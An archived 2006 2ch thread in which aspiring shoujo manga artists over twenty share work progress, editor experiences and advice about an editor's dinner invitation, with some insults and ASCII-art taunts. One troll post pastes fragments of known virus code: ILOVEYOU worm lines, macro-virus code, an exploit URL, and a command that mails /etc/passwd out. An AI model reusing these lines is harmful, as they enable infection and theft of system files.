2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆20歳過ぎても少女漫画家目指すスレ(13歳)◆

1 :名無しさん名無しさん:2006/09/12(火) 12:02:35
ひき続きマターリ。荒しはスルーで。
スレが20歳を迎える前にデビューしよう。
過去ログ・チャット・オフ会関連は>>2-3あたりへ。
新スレは>>980で。

【前スレ】
◆20歳過ぎても少女漫画家目指すスレ(12歳)◆
http://comic6.2ch.net/test/read.cgi/gcomic/1144296781/

2 :名無しさん名無しさん:2006/09/12(火) 12:03:55
オフ会・チャット等の交流を希望の方は目刺し
http://jbbs.shitaraba.com/comic/787/mezasi.html
【過去スレ】
(1歳)http://comic.2ch.net/gcomic/kako/1004/10043/1004356071.html
(2歳)http://comic.2ch.net/gcomic/kako/1004/10043/1004356071.html
(3歳)http://comic.2ch.net/test/read.cgi/gcomic/1043346381/
(4歳)http://comic.2ch.net/test/read.cgi/gcomic/1059902166/
(5歳)http://comic2.2ch.net/test/read.cgi/gcomic/1070284874/
(6歳)http://comic6.2ch.net/test/read.cgi/gcomic/1080791086/
(7歳)http://comic6.2ch.net/test/read.cgi/gcomic/1100175343/
(8歳)http://comic6.2ch.net/test/read.cgi/gcomic/1118110224/
(9歳)http://comic6.2ch.net/test/read.cgi/gcomic/1129169286/
(10歳)http://comic6.2ch.net/test/read.cgi/gcomic/1133462728/
(11歳)http://comic6.2ch.net/test/read.cgi/gcomic/1140873171/

3 :名無しさん名無しさん:2006/09/12(火) 13:46:07
>>1
乙!

4 :名無しさん名無しさん:2006/09/12(火) 14:47:44


5 :名無しさん名無しさん:2006/09/12(火) 15:53:26
おばさんガンバッテねw

6 :名無しさん名無しさん:2006/09/12(火) 20:38:44
>1乙!
原稿できたー!

7 :名無しさん名無しさん:2006/09/12(火) 21:23:58
     ,.-―┬-、
    /,. z===、ノ
    `i ハノヽハ〉    リボルバーとは執着心が強く気性が激しい
    ヾゝ!|,,゚ ヮ゚ノi   迷惑なりぼん読者・投稿者のことを指します。 
     _/i)_∀ト_     自分にとって気に入らないスレや違った意見の持ち主に
     ゙ーく_,/_jー'     喰ってかかりキチガイに荒らしまくります。
      〈 〈 〉 〉   りぼん読者・投稿者のタチの悪さは有名です。
      ゙-' `-'     みなさん、気をつけましょうね。


り ぼ ん 婆  →  り ぼ 婆  →  リ ボ ル バ ー




業界板まで荒す気ですか?

8 :名無しさん名無しさん:2006/09/12(火) 22:06:47
あーあ、ついに業界板か

9 :名無しさん名無しさん:2006/09/12(火) 22:47:59
初めて担当付いたー!と喜んでいたが
担当が自分より若いと知った時の衝撃といったらもう…orz

10 :名無しさん名無しさん:2006/09/12(火) 22:59:50
>>9
わ、私も・・・・・・orz
どうやら新入社員さんのようだ・・・・・
微妙だよね

11 :名無しさん名無しさん:2006/09/13(水) 06:23:42
よくあること

12 :名無しさん名無しさん:2006/09/13(水) 08:56:48
しかし50過ぎのおじさまで、
しかも今まで少女漫画を受け持ったことのない人
(異動でまわされてきた)
というのもかなり鬼門だぞw

13 :名無しさん名無しさん:2006/09/13(水) 09:12:48
それは辛過ぎる・・・

14 :名無しさん名無しさん:2006/09/13(水) 11:39:41
そのオジ様もかわいそう・・・

15 :名無しさん名無しさん:2006/09/13(水) 23:56:16
そういうのって左遷?昇進?

16 :名無しさん名無しさん:2006/09/16(土) 16:09:47
ホス

17 :名無しさん名無しさん:2006/09/19(火) 01:54:48
貼っても貼っても・・・

18 :名無しさん名無しさん:2006/09/19(火) 19:08:51
プロットできたから次はネーム
一週間で終わるかなあ

19 :名無しさん名無しさん:2006/09/19(火) 21:00:41
他スレ荒してるようじゃー終わんないわなw

20 :18:2006/09/20(水) 11:44:16
他スレ荒らす時間なんてないがな
ネームが一番てこずるんだよ。ホント…

21 :名無しさん名無しさん:2006/09/20(水) 23:38:09
>>20
もう間に合わんだろ…
とりあえず仮眠だ。仮眠。

22 :名無しさん名無しさん:2006/09/22(金) 19:37:53
いつまで寝てんだよ

23 :名無しさん名無しさん:2006/09/23(土) 01:03:19
いま起きたさ!

24 :名無しさん名無しさん:2006/09/23(土) 10:34:45
寝すぎ!!

25 :名無しさん名無しさん:2006/09/23(土) 13:45:18
そろそろメシにしよう

26 :名無しさん名無しさん:2006/09/25(月) 16:54:47
いつまで食ってんだよ

27 :花と名無しさん:2006/09/25(月) 17:50:04
なんか腹痛い…
でもバイトの時間だ

28 :名無しさん名無しさん:2006/09/26(火) 00:23:46
業界板に移ってから過疎が激しくなった

29 :名無しさん名無しさん:2006/09/26(火) 22:16:32
前のほうがよかったかもしれないね。

30 :名無しさん名無しさん:2006/09/26(火) 23:22:57
変な荒らしがないから良いよ

31 :名無しさん名無しさん:2006/09/26(火) 23:42:51
>>30
同意

そろそろ新しいネームつくろうかな

32 :名無しさん名無しさん:2006/09/27(水) 12:50:40
最近の投稿状況どう?

33 :名無しさん名無しさん:2006/09/27(水) 20:29:02
>>30
りぼんスレ荒しといてよく言うよ、リバー

34 :名無しさん名無しさん:2006/09/27(水) 20:29:41
月末に出したいんだが仕事も休み返上の忙しさ。
トーン貼るのメンドクサイよー

35 :名無しさん名無しさん:2006/09/27(水) 20:41:06
おばちゃんたち必死だね。
レディコミ行かないの?

36 :名無しさん名無しさん:2006/09/27(水) 23:40:35
>>29
禿同

37 :名無しさん名無しさん:2006/09/28(木) 00:41:02
She wanna be a POSO STAR
ぽそがずっと夢中なそれなんて重複スレ?
泥沼のPOSO STAR
噂を広げ 「馬鹿が。」をさせてあげよう ぽそだけに

重複スレ伸びた喜びと 重複がバレた淋しさの
両方を手に入れて ぽそはデスノり出す
表紙は描けるよぽそだから 魚類ばかりのキャラだけど
ねらー達に 失笑を 与えられたなら
重複がねらーにバレた瞬間に
まゆぽそがすぐに下した顛末は一時間後に即削除

She wanna be a POSO STAR
ぽそがずっと夢中な「馬鹿が。」「だお!(^ω^)」「ガキは黙ってろ。」
テラワロスPOSO STAR
増刊広げ「恥ずかしくて直視出来ない」wwwww

She wanna be your POSO STAR
目がどんどん離れていくから「あえて言う。」
テラキモスPOSO STAR
記事うpして 集英社に教えてあげよう ぽそだけに



38 :名無しさん名無しさん:2006/10/02(月) 00:06:13
眠い
トーン貼り嫌だなあ

39 :名無しさん名無しさん:2006/10/04(水) 22:16:41
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


40 :名無しさん名無しさん:2006/10/11(水) 20:26:48
ホシュ

41 :名無しさん名無しさん:2006/10/14(土) 17:35:33


42 :名無しさん名無しさん:2006/10/15(日) 16:50:25
なんか最近、恋愛とかどうでもよくなってきた。
はぁ、少女漫画家志望としては絶望的・・・

43 :名無しさん名無しさん:2006/10/15(日) 16:56:17
↑同感
周りにもやばいよって言われるけど、とにかく今は夢を叶えたい。

投稿ページ見ても若い人ばっかりで焦る…

44 :名無しさん名無しさん:2006/10/15(日) 17:15:26
なんか恋愛漫画描いてると、リアルで恋愛してなくても平気にならない?
恋愛モノの映画や小説見ると恋愛してると同じ脳内物質が出るらしいけど、そんな感じかもしれん・・・

45 :名無しさん名無しさん:2006/10/15(日) 17:46:54
好きな漫画の好きなキャラにハァハァするのもいい。

46 :名無しさん名無しさん:2006/10/15(日) 18:28:13
生身の人間に興味が薄れてきたってのもあるな。
2次元にしか萌えられないw

47 :名無しさん名無しさん:2006/10/15(日) 23:45:35
キモイw

リバーだらけだったんだね・・・ここ。

48 :名無しさん名無しさん:2006/10/15(日) 23:50:21
リバーって何だ?

ここにいる方って何歳ぐらいの人が多いのかな。
25歳越えてる人もいるの??

49 :名無しさん名無しさん:2006/10/16(月) 00:13:29
>>48
アレだ、りぼん投稿者。
時間あったら除いてみな
しょっちゅうageってる

キチガイや粘着はだいたいリバー(リボって言ってる奴もいる)

50 :名無しさん名無しさん:2006/10/16(月) 11:16:31
私は28歳だお…orz

51 :名無しさん名無しさん:2006/10/16(月) 16:36:23
私は先月22になってしまった。

52 :名無しさん名無しさん:2006/10/16(月) 17:27:35
自分は22才から投稿始めたorzすでに26。
トーンの削りも何もわからんド素人だったけど、三年目にしてやっと賞とって担当ついたよ(つД`)
仕事との両立は難しいけど、ガンガルぞ(`・ω・´)ゝ”

53 :名無しさん名無しさん:2006/10/16(月) 18:30:01
>>52
てことは賞取ったの25?
始めた年齢も重要なのか…
22の頃、「話の作り方が分からない!雑誌別の需要が分からない!」
と焦って研究してたら24になりそうだお

54 :名無しさん名無しさん:2006/10/16(月) 20:15:06
24で初投稿して一度デビュして失敗して
29で再デビュしてでそこでも微妙で
今30でもっかい再デビュしました。
三度目の正直ていうかもう後がない。

55 :名無しさん名無しさん:2006/10/16(月) 22:32:42
いいなぁ、何度もデビュー出来て
私にも分けて欲しいわ

56 :名無しさん名無しさん:2006/10/17(火) 01:41:35
>>54
初投稿でデビューというのがうらやましい!
再デビューのときって雑誌や出版社変えたりするんですか?

57 :54:2006/10/17(火) 08:13:39
>56
初投稿でデビューじゃないです・・・
受賞はしたけどデビューは一年半後。
しかもすぐ捨てられたしorz
出版社変えました。
三度目は同じ出版社内で雑誌だけ変えました。

58 :名無しさん名無しさん:2006/10/17(火) 17:15:24
>>57
読み間違えた・・・m(__)m教えてくれてありがとうございました!

今年こそデビューしたかったけど無理っぽい
あたしも頑張ります!!

59 :名無しさん名無しさん:2006/10/17(火) 22:03:50
10代(保留して様子見可能)とか超有名人じゃない限り初投稿デビューは無理っぽいな
一回きりじゃやる気、実力を見れないし。

60 :名無しさん名無しさん:2006/10/18(水) 03:01:25
荒川弘は初投稿デビュー
持込経験はあったみたいだけど

61 :名無しさん名無しさん:2006/10/18(水) 03:52:44
>>60
ハガレンはサンデーに最初持ち込んだんじゃなかったっけ

62 :名無しさん名無しさん:2006/10/18(水) 17:30:30
去年から就職先探しつつ漫画描いてるけど、一向に仕事先見つからなくて鬱・・・。
今日も不採用通知来た。泣けてきた。何十社落ちたかもう覚えてないや。
原稿持ち込んで批判されてもネームのダメだしの電話が来ても割と平気なのに
なんでこう仕事見つからないのは凄まじく辛いんだろう。
仕事しながら漫画描いてる人が本気で羨ましい。

63 :名無しさん名無しさん:2006/10/18(水) 17:56:39
漫画だけで食ってる人を羨ましがりなさいw

64 :名無しさん名無しさん:2006/10/18(水) 19:13:44
自分は漫画家になりたいと思ったときにすでに会社員だったから
辞めて目指そうとは思わなかったけど、
もしそのとき学生やフリーターだったら漫画一本に絞ってたと思う。
62はバイトとかじゃダメなの?

65 :62:2006/10/18(水) 20:32:59
バイトはしてる。
でも奨学金の返済+家を出るには足りないので正社員になりたい。
定年間近の父親も、娘が無職でいつまでも同居なのは我慢できないみたいだし
家族が不仲になる前に自分から離れようと思って。
一度で良いから面接突破してみたい・・・

66 :名無しさん名無しさん:2006/10/18(水) 21:40:12
>>65
本当に就職したいなら、漫画はいったん休んで就職に全力注ぎなよ。
就職してから漫画を再開すればいいし。
企業の採用者って、意外と志望者の中途半端な気持ち見抜くもんだよ。

67 :名無しさん名無しさん:2006/10/18(水) 22:02:50
>62
何歳なんだろう?
二十代後半で何の職歴もないならいきなり正社員は難しそう。
まずは派遣社員で職歴を積むというのもアリだと思う。
派遣→正社員の実績の多い会社を狙ってみては。
二十台前半なら第二新卒としてまだ需要ありそう。

奨学金受けてないからわからないけど、
10年後とか漫画家として売れてからではダメなの?
家を出るだけならアシスタント&バイトでなんとかなりそう。

今確かに景気は上向きだけど
それは企業が正社員を減らして派遣や契約に切り替えてるから。
新卒や、即戦力になる中途は積極的になってきているけど
職歴なしかつ第二新卒以降の年齢には返って厳しいと思う。

68 :名無しさん名無しさん:2006/10/18(水) 22:56:57
豚義理スマン
別フレの移動教室案内きた。
今年からはマンツーマン形式になるみたい。必ず完成原稿を持って来いって。
今日速達で案内来て、返事は23必着。29日開催w

69 :名無しさん名無しさん:2006/10/18(水) 23:15:14
ひでえ・・・。

白線LALAの移動教室きたけど、
開催の一ヶ月以上前に連絡きたよ。
完成原稿はあったら見てくれるらしい。


70 :名無しさん名無しさん:2006/10/19(木) 00:45:49
ララでもギリギリの時あるよ

別フレって事件以来すごい売り上げ落ち込んだよね
投稿者も減っただろうし、編集部も必死なんだろうな

71 :名無しさん名無しさん:2006/10/19(木) 01:11:54
別フレ事件ってなに
ぐぐったら地名がどうとか?みたいなの出てきたけど

72 :名無しさん名無しさん:2006/10/19(木) 01:13:43
別フレに投稿してたけどやめました。
元々投稿数は少ない雑誌だったけど、雑誌の売り上げだけじゃなく
投稿数も減ったみたいで実際編集も困ってると思う。


73 :名無しさん名無しさん:2006/10/19(木) 01:40:52
なんか阿呆な担当が居たとかだっけ?別ふれ。

74 :名無しさん名無しさん:2006/10/19(木) 01:44:11
自分もぐぐってみた。
大阪の西成区について差別的な発言があったらしい。

確かに出版社として軽率な文章だと思うけども、
大阪に住んでいて西成に行ったこともよくある自分としては、
漫画を読んで何も知らない女子中学生や高校生が、
一人に西成に行こうと思い立ったら、
偏見や差別問題より、そっちが真剣に危ないと思ってしまった。
場所によっては本気でヤバいからな…。

75 :名無しさん名無しさん:2006/10/19(木) 01:52:13
事件ってトレース事件のことでそ?
ニュースでもやっててびっくりだったけど。

76 :名無しさん名無しさん:2006/10/19(木) 07:43:48
トレース事件しか知らなかったな。

前に行った時はお金の使い方が少しズサンだと思った。
交通費なんか領収無くても申請分くれたし☆
普段経費をうるさく言われる貧乏会社のOLには夢の様だったよ。

77 :名無しさん名無しさん:2006/10/19(木) 17:11:38
大手出版社の経費の使いっぷりは見事だよ。

78 :名無しさん名無しさん:2006/10/21(土) 18:28:41
別フレ辞めた連中はどこに行ってるんだろ、まさか別マじゃないよね。
これ以上、投稿者増えないで〜って感じ・・・

79 :名無しさん名無しさん:2006/10/21(土) 20:33:57
なんでマーガレットとかって別冊の方が売れてるんだろうね

80 :名無しさん名無しさん:2006/10/22(日) 00:21:36
私は全然そうゆう事情知らないんですけどみんなどこからそんな情報得るの?
やっぱり年齢とかってかなり重要なんですか?ちなみに私はまだ投稿したこと
ありません...てか原稿仕上げたことすらありません。ネームどまりです。
今は少年漫画を描いてる途中です。自分でもどっちがやりたいのかはよく分からなくて..。
20です。なんか駄目ですよね....(暗い..)

81 :名無しさん名無しさん:2006/10/22(日) 00:39:00
誘い受けうざ

82 :名無しさん名無しさん:2006/10/22(日) 00:42:23
     ,.-―┬-、
    /,. z===、ノ
    `i ハノヽハ〉    リボルバーとは執着心が強く気性が激しい
    ヾゝ!|,,゚ ヮ゚ノi   迷惑なりぼん読者・投稿者のことを指します。 
     _/i)_∀ト_     自分にとって気に入らないスレや違った意見の持ち主に
     ゙ーく_,/_jー'     喰ってかかりキチガイに荒らしまくります。
      〈 〈 〉 〉   りぼん読者・投稿者のタチの悪さは有名です。
      ゙-' `-'     みなさん、気をつけましょうね。


り ぼ ん 婆  →  り ぼ 婆  →  リ ボ ル バ ー
http://comic6.2ch.net/test/read.cgi/gcomic/1160124667/

ご来場の際には「リボ!」または「リバー!」と一言お掛け下さいm(_ _)m



83 :名無しさん名無しさん:2006/10/22(日) 00:42:44
>80
投稿以前に日本語勉強推奨

84 :名無しさん名無しさん:2006/10/22(日) 00:49:28
一行で素っ気ない態度とんのやめようよ
書き込まなくても一緒じゃん

85 :名無しさん名無しさん:2006/10/22(日) 00:52:09
20にもなって「そうゆう」って…

86 :名無しさん名無しさん:2006/10/22(日) 00:58:16
20にもなってる筈なのに
イタイのが常にいる。

キチガイに年齢は関係ないってことか

87 :名無しさん名無しさん:2006/10/22(日) 01:01:06
>>78

両方持ち込みしたことある身としては
別マは厳しいこと言われるけどとても的を得ていて、さすが一流出版社って感じがした
別フレはねぇ…なんかよろしくなかったよ
社風って言うのかな、やっぱり集英社にはかなわないって言うか
中流と言うか。微妙なプライドみたいなものが見え隠れしてたように感じた

だから別フレから移動してくる気持ちわかるなぁ



88 :名無しさん名無しさん:2006/10/22(日) 01:01:32
もう80は半年ロムれでオケ

89 :名無しさん名無しさん:2006/10/22(日) 01:01:59
>>80
2ちゃん初心者なんですね。半年はロムってくださいね。

90 :名無しさん名無しさん:2006/10/22(日) 01:06:35
別マはもうベテランがどかない限り
枠が無くないか?

91 :名無しさん名無しさん:2006/10/22(日) 01:06:50
>>87
私も別マ持ち込んだことあるけど、あまり印象良くなかった。若い人だったからかもだけど。
友人は別フレ志望で担当もいるけど、ちゃんと指導してくれるみたいだよ。
会社とか編集部より、編集個人によって違うんじゃないかな。

92 :名無しさん名無しさん:2006/10/22(日) 01:19:06
>>91
そうか、じゃあたまたま運が悪かっただけなのかな
良い人にあたりたいなー本当…

クッキーはね、おそろしく対応が良かったよ
某大物漫画家担当者さんにあたったんだけどその人からも大物の香りがしたw
それで集英社はすげーと言う印象がついてしまた

93 :名無しさん名無しさん:2006/10/22(日) 01:47:37
そ、そうか・・・。自分はクッキー最悪だった。
91のように編集個人の問題なんだね。
別フレとマーガはきちんと批評してくれたよ。

94 :名無しさん名無しさん:2006/10/22(日) 02:01:54
ホストクラブみたいに指名できたらパラダイスなのにね

95 :名無しさん名無しさん:2006/10/22(日) 02:10:18
>>80
気にすんな。
ここにいる殆どが30越か近いババアが多いんだ。
20に戻りたくても戻れない劣等感が牙を向いただけの話
しかし女のカキコは陰湿なのが多い、と。

96 :名無しさん名無しさん:2006/10/22(日) 02:12:28
>>94
鏡と原稿見直せな

97 :名無しさん名無しさん:2006/10/22(日) 02:25:23
>>96
どっちもハイレベルさ!
もちろんマイナス方向で。

98 :名無しさん名無しさん:2006/10/22(日) 05:16:41
20代後半〜30前後は賞味期限切れ前だけど
10年↑使ったら恐ろしい事に

99 :名無しさん名無しさん:2006/10/22(日) 06:51:37
>>95
80じゃないけど
なんであんな反応するんだって思ってたら
そういうこともあるのか

100 :名無しさん名無しさん:2006/10/22(日) 09:20:18
よーし描くぞー(`・ω・´)
出かける予定なのに風呂入ってなくて臭いけど私は原稿をとるぜ。

101 :名無しさん名無しさん:2006/10/22(日) 12:29:54
板変わったら住人も変わったね

102 :名無しさん名無しさん:2006/10/22(日) 12:51:54
男が増えたような気がするけど、過疎るよりはマシか

103 :名無しさん名無しさん:2006/10/22(日) 13:00:13
男がじゃなく変なのが居ついた

104 :名無しさん名無しさん:2006/10/22(日) 13:10:13
やっと完成。ようやく安眠できる。

105 :名無しさん名無しさん:2006/10/22(日) 13:51:05
永眠しとけ

106 :名無しさん名無しさん:2006/10/22(日) 17:16:39
了解w

107 :名無しさん名無しさん:2006/10/22(日) 17:24:50


108 :名無しさん名無しさん:2006/10/23(月) 23:11:05


109 :名無しさん名無しさん:2006/10/24(火) 12:36:19


110 :名無しさん名無しさん:2006/10/24(火) 17:41:30
夕方…
下描き中だがなかなか進まん
ネーム煮詰まってる時より気持ちは楽だが

111 :名無しさん名無しさん:2006/10/24(火) 18:15:45
でも原稿のペン入れが最終段階になったあたりの、
だんだん単純作業になっていくあたりって気持ちよくない?

112 :名無しさん名無しさん:2006/10/24(火) 22:18:04
単調作業ニガテだー。ペン入れが好きトーンが嫌・・・

113 :名無しさん名無しさん:2006/10/24(火) 23:23:28
>>112漏れにやらせろ!埋め尽くしてやるぜw

114 :名無しさん名無しさん:2006/10/24(火) 23:24:57
私もトーン苦手だ・・・でも何より下描きが一番嫌いだ
やっぱりペン入れいちばん好き

115 :名無しさん名無しさん:2006/10/24(火) 23:46:03
ペン入れ1日1Pしか進まない・・・
でも昔は1日1コマとかだったから、進歩してるのかも。

116 :名無しさん名無しさん:2006/10/26(木) 22:09:16
担当さん男で、結構仲良くて、普段はカフェとかで打ち合わせしてたんだけど、
こないだ「今度会社終わった後、ご飯でも食べながら打ち合わせしよう」って言われた。

口説かれてるのかな?考え過ぎ?夜ご飯食べながら打ち合わせする人っていますか?
どっちなのか心構えしていきたい…

117 :名無しさん名無しさん:2006/10/26(木) 22:45:44
そんなのよくあるけどな。
会社終わった後なら時間的にそのまま
何も食わずに打ち合わせに
担当さんを付き合わせる方が気がひける

118 :名無しさん名無しさん:2006/10/26(木) 23:10:15
>>116
あなたは可愛いんでしょうか?もしそうなら口説かれてると思います。

119 :名無しさん名無しさん:2006/10/26(木) 23:27:55
臨機応変に対応すればよいのでは。
で、あなた的にはアリな感じなのかい?

120 :名無しさん名無しさん:2006/10/27(金) 03:44:48
志望者の段階でそのままくっついたら、
君のその雑誌での将来はないから、よく考えような。
あわよくばうまくいっても担当場部署替えになるしな。


121 :名無しさん名無しさん:2006/10/27(金) 04:03:56
普段は就業時間内に打ち合わせしてるのに、
今度から会社終わった後に打ち合わせしようって言われてるなら口説かれてると思う。

普段は就業時間後打ち合わせしてるなら、カフェじゃなくて飯が良いってだけだと思う。


122 :名無しさん名無しさん:2006/10/27(金) 04:20:23
夕飯食べながら打ち合わせはあるな。ビール呑んだり。
その後編集はたいてい会社に戻るが。

123 :名無しさん名無しさん:2006/10/27(金) 06:33:03
担当から遅い時間を指定された事ないな。
自分から遅い時間でお願いしたときは一緒に夕食食べた。
自分は女の担当だけど、男の担当で二人っきりご飯打ち合わせはちょっとなぁ
口説いてるんじゃなければ、モラル無いよね

124 :名無しさん名無しさん:2006/10/27(金) 09:56:38
実際、口説かれた人とかいないの?

125 :名無しさん名無しさん:2006/10/27(金) 11:50:54
>>117,122
担当男??
自分の担当女だからわからん。

126 :名無しさん名無しさん:2006/10/27(金) 12:14:26
つか、口説かれたり(女として)誘われたりするのって、
漫画家として見込みないからじゃない・・・?
将来的にデビューしたら絶対やばいじゃん。

127 :名無しさん名無しさん:2006/10/27(金) 12:16:50
実際、結婚してるのはヒット作家さんばかりだしね。
志望者に本気になるほど担当もバカじゃないよ。

128 :名無しさん名無しさん:2006/10/27(金) 13:17:12
>>126
それはさすがに勘ぐり過ぎじゃww
担当と作家の距離って近いからなーー。かわいい20代の娘に頼られたらちょっとぐらつくんじゃん?
若い担当だとちゃんと分けて考えれなそうだしさ。断るのも角が立つから難しいよね〜〜〜
かずはじめなんてブスだったけど略奪婚だしww

129 :名無しさん名無しさん:2006/10/27(金) 13:18:22
でも雑誌で何で載ってるか分からない漫画とか
作家が美人な場合あるよね。
絶対、枕営業だなーと思う。

130 :名無しさん名無しさん:2006/10/27(金) 13:28:33
え、あの人♀だったのか。

>>116
断りにくいよね。
とりあえず一度食事に行って様子を見てみたらどう?


131 :名無しさん名無しさん:2006/10/27(金) 13:34:27
移動教室とか新年会とかいくと
最近の少女漫画志望者・新人はフツーにかわいい子が多い。
あんなのが何人も自分を頼ってきてりゃ
ヘンな気を起こす男編集もいるかもしれん。

132 :名無しさん名無しさん:2006/10/27(金) 13:40:37
作家スレでも見込みない子が狙われるって書いてあった気がする
でもそんなこと言ったら一般の会社だってバイトとか、いずれ消える子はやり逃げ要員に狙われやすいし、
結局は個人の常識なんだろうけど

133 :名無しさん名無しさん:2006/10/27(金) 13:56:53
>>132同意
すぐ消えそうな子が狙われるのはあるよね。向こうからしたらむしろ消えてほしいわけだし。
本当に漫画家として育てたいと思ってたら手を出すことはないと思うよ。
まあ一緒に食事ぐらいなら普通の社会的付き合いだと思うけど。

134 :名無しさん名無しさん:2006/10/27(金) 14:49:04
少女漫画家と編集の結婚はそんなに珍しくないから
真面目なおつきあいならいいと思うけど・・・。
まともなモラルを持った人なら
相手が断りづらいとか困るのわかってるんだから
気軽に誘ったりしないはず。
ただ夜の食事だけなら深い意味はないかもしれないから
普通に打ち合わせて普通に帰ればいいと思う。
その後もつきあわされるようなら笑顔で「終バス早いんです」
で無邪気に断っちゃえ。

135 :名無しさん名無しさん:2006/10/27(金) 15:04:16
こんだけ盛り上がっといて相手の編集はフツーに仕事としか考えてなかったらワロス

136 :名無しさん名無しさん:2006/10/27(金) 15:09:57
もしアタシが担当で、若い可愛い男の投稿者来たら
食事ぐらい誘っちゃうだろうな。

137 :名無しさん名無しさん:2006/10/27(金) 15:14:12
男女どちらとも食事しながら打ち合わせしたことあるよ
普通に編集の晩御飯につきあったような感じでもあった
ただ食事終了が深夜にならない限り編集は会社戻って仕事続行

その編集が「仕事終った後に」って言うのがワザワザっぽくてちょっとね
正直どっちなのかは行ってみないとわかんないかも
早めの時間に設定してもらって区切りいいところで「頑張ります!」
で無邪気に帰っちゃえ
いざって時逃げ切る気力がもてないなら
「つい食べることに夢中になっちゃうから茶の方がいいな」とかお願いしてみなね

138 :名無しさん名無しさん:2006/10/27(金) 15:17:23
>>135
確かにw

自分の場合ですが、ランチに行くことはあっても夜はないです。
そもそもお茶はあっても食事自体めったにないですが・・・。
けど116さんの場合はちょっと臭いますよね。


139 :名無しさん名無しさん:2006/10/27(金) 15:27:22
口説かれるかも、わくわく・・・・なんじゃね?

140 :名無しさん名無しさん:2006/10/27(金) 17:58:03
編集がカッコよければ、ヤッちゃえばいいんじゃない?
で無理やりデキ婚とか。
1流出版の編集者なら食いっぱぐれないだろうし、一石二鳥!!

141 :名無しさん名無しさん:2006/10/27(金) 18:01:51
結婚するため漫画投稿してんのかw
さすが20歳以上投稿者スレだな

142 :名無しさん名無しさん:2006/10/27(金) 18:34:18
志望者が編集と結婚なんて、ナースが医者と結婚するくらい難しいんじゃないかの

143 :名無しさん名無しさん:2006/10/27(金) 18:47:44
まあ少女漫画家を目指すなら
妄想力はあるにこしたこたないだろ。

144 :名無しさん名無しさん:2006/10/27(金) 22:56:38
でも視聴率はいいらしいよ

145 :144:2006/10/27(金) 22:57:55
スマン、誤爆した。

146 :名無しさん名無しさん:2006/10/28(土) 18:13:45
>>145
あながち間違いでもないんじゃないか?
こんなにレスが伸びたとこみると

147 :名無しさん名無しさん:2006/10/28(土) 19:00:31
何このワロスな流れwww

148 :名無しさん名無しさん:2006/10/28(土) 19:09:41
少女漫画が分からない・・・
歳を取ってくと、考え方が男っぽくなるのか
少女の感性についていけん。

149 :名無しさん名無しさん:2006/10/28(土) 19:18:57
自分が十代のころ、
恋愛ものがこっぱづしくてどうしても描けなかった。
いいかげんとしくった今
「あらあらいーわね若いコの恋愛って!」
というおばちゃん視線で素直に描けるようになりますた。

150 :名無しさん名無しさん:2006/10/28(土) 19:36:37









  う ん 、 わ か っ た 出 て 行 け り ぼ ん 投 稿 者













151 :名無しさん名無しさん:2006/10/28(土) 20:37:28
>>149
自分もそうだ
当時は描きたいとも思わなかった恋愛話を今なら作れるようになった
その年頃の時にこんな恋がしたかった しとけばよかった すればいいのに みたいな
願望妄想がストレートに反映できる
変な心の鎧が取れて素直に主人公の感情表現につなげられてる
恋以外でも、十代のうちに生々しい話や素直な話を作れる人ってすごいなと思う

152 :名無しさん名無しさん:2006/10/28(土) 21:37:56
精神病の漫画家アシ日記

http://www5.diary.ne.jp/profile.cgi?user=520483


153 :名無しさん名無しさん:2006/10/28(土) 23:11:06
自分はFFやって恋愛オタになったな…

154 :名無しさん名無しさん:2006/10/28(土) 23:56:08
>>153
[か?

155 :名無しさん名無しさん:2006/10/29(日) 15:30:58
>>154
ううん。6と7と9と10。

少女の頃の感性?
「女子高生をブランド扱いするテレビや雑誌萎え!」
「年頃で美人の処女以外は女扱いしない男萎え!」
「『こういう人間じゃなきゃ駄目』みたいなテンプレ萎え!」
「失敗して恥をかくのが怖い。」
だった…。

156 :名無しさん名無しさん:2006/10/29(日) 16:33:41
>>129
2chで「何で載ってるか解らない」って言われる男の漫画家もいっぱい居るぞw

157 :名無しさん名無しさん:2006/10/29(日) 16:43:10
枕営業なんじゃないの。
女編集とかさ

158 :名無しさん名無しさん:2006/10/29(日) 16:49:10
そのうちの一人の作家は2chに現れて童貞って言ってたよ

159 :名無しさん名無しさん:2006/10/29(日) 16:51:18
FF6は今年取ってからやると結構ハズカシイ

160 :名無しさん名無しさん:2006/10/29(日) 17:47:11
女編集が枕業するメリットなんてないだろw


161 :名無しさん名無しさん:2006/10/29(日) 17:57:33
つかなにこの流れw枕営業がよくあることだと思ってる奴らキモスw
漫画業界は芸能界に比べたらまだまだ実力社会だよ。
コネや何かで一時期プッシュされても売れなきゃ終わり。

162 :名無しさん名無しさん:2006/10/29(日) 18:17:14
FF4に至ってはギャグw

FF6は今やると恥ずかしいけど今の方が意図が分かる。
